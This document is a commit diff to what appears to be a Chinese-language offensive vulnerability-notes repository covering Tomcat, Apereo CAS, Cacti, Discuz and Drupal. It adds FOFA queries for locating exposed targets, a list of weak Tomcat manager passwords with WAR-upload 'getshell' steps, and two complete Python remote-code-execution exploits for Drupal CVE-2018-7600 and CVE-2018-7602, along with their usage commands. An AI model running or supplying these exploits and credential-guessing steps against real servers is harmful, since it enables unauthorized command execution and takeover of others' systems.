修改and添加

Apache-Tomcat/AJP 文件包含漏洞（CVE-2020-1938）/README.md

@@ -20,6 +20,8 @@ Tomcat AJP Connector 默认配置下即为开启状态，且监听在 0.0.0.0:80
 
 ```bash
 xray servicescan --target 127.0.0.1:8009
+
+或者Goby也有此POC
 ```
 
 ## EXP

Apache-Tomcat/README.md

@@ -1,28 +1,48 @@
 ## 应用简介
 
-图标！！！
+![img](tomcat.png)
 
 Tomcat 是当前最流行的 Java 中间件服务器之一。
 
-弱口令：
-
-```http
-admin/admin
-admin/Admin@123
-tomcat/tomcat
-tomcat/空
-```
+官方网站：http://tomcat.apache.org
 
 ## 相关资产
 
 FOFA
 
 ```http
-
+app="APACHE-Tomcat"
 ```
 
 ## 环境搭建
 
-xx官网链接
+VulnRange可快速搭建此环境
+
+## 弱口令Getshell
+
+1、访问`ip:8080/manager/html`
+
+```http
+admin/admin
+admin/Admin
+admin/Admin@123
+tomcat/tomcat
+tomcat/空
+tomcat/123456
+tomcat/654321
+tomcat/000000
+tomcat/111111
+admin/123456
+admin/654321
+admin/000000
+admin/111111
+```
+
+2、部署`war包`getshell
+
+```bash
+#shell.jsp单独放置一个目录，命令行下进入当前目录,打包成war包
+jar -cvf login.war .\
+```
 
-2、VulnRange可快速搭建此环境
+找到 WAR file to deploy 这一项，上传war包后应用即可

Apereo-CAS/Apereo CAS 4.1 反序列化命令执行漏洞/README.md

@@ -41,10 +41,8 @@ username=test&password=test&lt=LT-2-gs2epe7hUYofoq0gI21Cf6WZqMiJyj-cas01.example
 
 ## EXP
 
-```bash
-cas_exploit-1.0-SNAPSHOT-all.jar
-```
+两个都是图形化工具
 
-## 参考链接
+**EXP1**：cas_exploit-1.0-SNAPSHOT-all.jar
 
-暂无
+**EXP2**：[@nice0e3](https://github.com/nice0e3/Cas_Exploit)

Apereo-CAS/README.md

@@ -1,6 +1,10 @@
 ## 应用简介
 
- Apereo CAS是一个开源的企业级单点登录系统
+![](logo.png)
+
+Apereo CAS是一个开源的企业级单点登录系统
+
+Github：https://github.com/apereo/cas
 
  * 一个开放且有据可查的协议
  * 开源Java服务器组件
@@ -9,4 +13,16 @@
  * Java，.Net，PHP，Perl，Apache，uPortal等客户端的库
  * 与uPortal，BlueSocket，TikiWiki，Mule，Liferay，Moodle等集成
  * 社区文档和实施支持
- * 广泛的采用者社区
+ * 广泛的采用者社区
+
+## 相关资产
+
+FOFA
+
+```http
+app="apereo-CAS"
+```
+
+## 环境搭建
+
+[VulnRange](https://github.com/wgpsec/VulnRange)可一键开启此环境

Cacti/README.md

@@ -8,7 +8,7 @@ Cacti（仙人掌）是一套基于 RRDTool 的服务器网络流量监测-图
 
 官方文档：https://docs.cacti.net
 
-默认账户：admin/admin
+默认账户：`admin/admin`
 
 ## 相关资产
 

Discuz/README.md

@@ -1,2 +1,18 @@
 ## 应用简介
-开源论坛社区
+Discuz! 是一款开源论坛社区
+
+官方网站：https://www.discuz.net
+
+## 相关资产
+
+```http
+app="Tencent-Discuz"
+```
+
+## 环境搭建
+
+下载源码-upload文件夹中的内容上传到网站目录
+
+## Discuz!X 3.4 系列漏洞梳理
+
+https://xz.aliyun.com/t/7492

Drupal/Drupal geddon-2 RCE（CVE-2018-7600）/CVE-2018-7600.py

@@ -0,0 +1,57 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from bs4 import BeautifulSoup
+
+def get_args():
+  parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py",
+                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
+                    epilog= '''
+                    This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57
+                    by poisoning the recover password form (user/password) and triggering it with
+                    the upload file via ajax (/file/ajax).
+                    ''')
+  parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
+  parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
+  parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
+  parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
+  args = parser.parse_args()
+  return args
+
+def pwn_target(target, function, command, proxy):
+  requests.packages.urllib3.disable_warnings()
+  proxies = {'http': proxy, 'https': proxy}
+  print('[*] Poisoning a form and including it in cache.')
+  get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
+  post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
+  r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
+  soup = BeautifulSoup(r.text, "html.parser")
+  try:
+    form = soup.find('form', {'id': 'user-pass'})
+    form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
+    if form_build_id:
+        print('[*] Poisoned form ID: ' + form_build_id)
+        print('[*] Triggering exploit to execute: ' + command)
+        get_params = {'q':'file/ajax/name/#value/' + form_build_id}
+        post_params = {'form_build_id':form_build_id}
+        r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
+        parsed_result = r.text.split('[{"command":"settings"')[0]
+        print(parsed_result)
+  except:
+    print("ERROR: Something went wrong.")
+    raise
+
+def main():
+  print ()
+  print ('=============================================================================')
+  print ('|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |')
+  print ('|                              by pimps                                     |')
+  print ('=============================================================================\n')
+
+  args = get_args() # get the cl args
+  pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())
+
+
+if __name__ == '__main__':
+  main()

Drupal/Drupal geddon-2 RCE（CVE-2018-7600）/README.md

@@ -0,0 +1,24 @@
+## 漏洞概述
+Drupal 是一款用量庞大的CMS，其6/7/8版本的Form API中存在一处远程代码执行漏洞
+
+## 影响范围
+```http
+Drupal 7 <= 7.57
+```
+
+## POC
+
+```bash
+nuclei -tags drupal -t cves/ -l urls.txt
+
+或者Goby
+```
+
+## EXP
+
+```bash
+python CVE-2018-7600.py http://target.local/
+```
+
+[@pimps](https://github.com/pimps/)
+

Drupal/Drupal 需要密码 内核RCE（CVE-2018-7602）/CVE-2018-7602.py

@@ -0,0 +1,79 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from bs4 import BeautifulSoup
+
+def get_args():
+  parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7602.py",
+                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
+                    epilog= '''
+                    This script will exploit the (CVE-2018-7602) vulnerability in Drupal 7 <= 7.58
+                    using an valid account and poisoning the cancel account form (user_cancel_confirm_form) 
+                    with the 'destination' variable and triggering it with the upload file via ajax (/file/ajax).
+                    ''')
+
+  parser.add_argument("user", help="Username")
+  parser.add_argument("password", help="Password")
+  parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
+  parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
+  parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
+  parser.add_argument("-x", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
+  args = parser.parse_args()
+  return args
+
+def pwn_target(target, username, password, function, command, proxy):
+  requests.packages.urllib3.disable_warnings()
+  session = requests.Session()
+  proxyConf = {'http': proxy, 'https': proxy}
+  try:
+    print('[*] Creating a session using the provided credential...')
+    get_params = {'q':'user/login'}
+    post_params = {'form_id':'user_login', 'name': username, 'pass' : password, 'op':'Log in'}
+    print('[*] Finding User ID...')
+    session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
+    get_params = {'q':'user'}
+    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
+    soup = BeautifulSoup(r.text, "html.parser")
+    user_id = soup.find('meta', {'property': 'foaf:name'}).get('about')
+    if ("?q=" in user_id):
+      user_id = user_id.split("=")[1]
+    if(user_id):
+      print('[*] User ID found: ' + user_id)
+    print('[*] Poisoning a form using \'destination\' and including it in cache.')
+    get_params = {'q': user_id + '/cancel'}
+    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
+    soup = BeautifulSoup(r.text, "html.parser")
+    form = soup.find('form', {'id': 'user-cancel-confirm-form'})
+    form_token = form.find('input', {'name': 'form_token'}).get('value')
+    get_params = {'q': user_id + '/cancel', 'destination' : user_id +'/cancel?q[%23post_render][]=' + function + '&q[%23type]=markup&q[%23markup]=' + command }
+    post_params = {'form_id':'user_cancel_confirm_form','form_token': form_token, '_triggering_element_name':'form_id', 'op':'Cancel account'}
+    r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
+    soup = BeautifulSoup(r.text, "html.parser")
+    form = soup.find('form', {'id': 'user-cancel-confirm-form'})
+    form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
+    if form_build_id:
+        print('[*] Poisoned form ID: ' + form_build_id)
+        print('[*] Triggering exploit to execute: ' + command)
+        get_params = {'q':'file/ajax/actions/cancel/#options/path/' + form_build_id}
+        post_params = {'form_build_id':form_build_id}
+        r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
+        parsed_result = r.text.split('[{"command":"settings"')[0]
+        print(parsed_result)
+  except:
+    print("ERROR: Something went wrong.")
+    raise
+
+def main():
+  print ()
+  print ('===================================================================================')
+  print ('|   DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602)     |')
+  print ('|                                   by pimps                                      |')
+  print ('===================================================================================\n')
+
+  args = get_args() # get the cl args
+  pwn_target(args.target.strip(),args.user.strip(),args.password.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())
+
+
+if __name__ == '__main__':
+  main()

Drupal/Drupal 需要密码 内核RCE（CVE-2018-7602）/README.md

@@ -0,0 +1,19 @@
+## 漏洞概述
+
+*Drupal*是使用PHP语言编写的开源内容管理框架（CMF）
+
+## 影响范围
+
+```http
+(需要账户密码)
+7.x
+8.x
+```
+
+## EXP
+
+```python
+python CVE-2018-7602.py marcio2 teste123 http://127.0.0.1:9090/
+```
+
+[@pimps](https://github.com/pimps)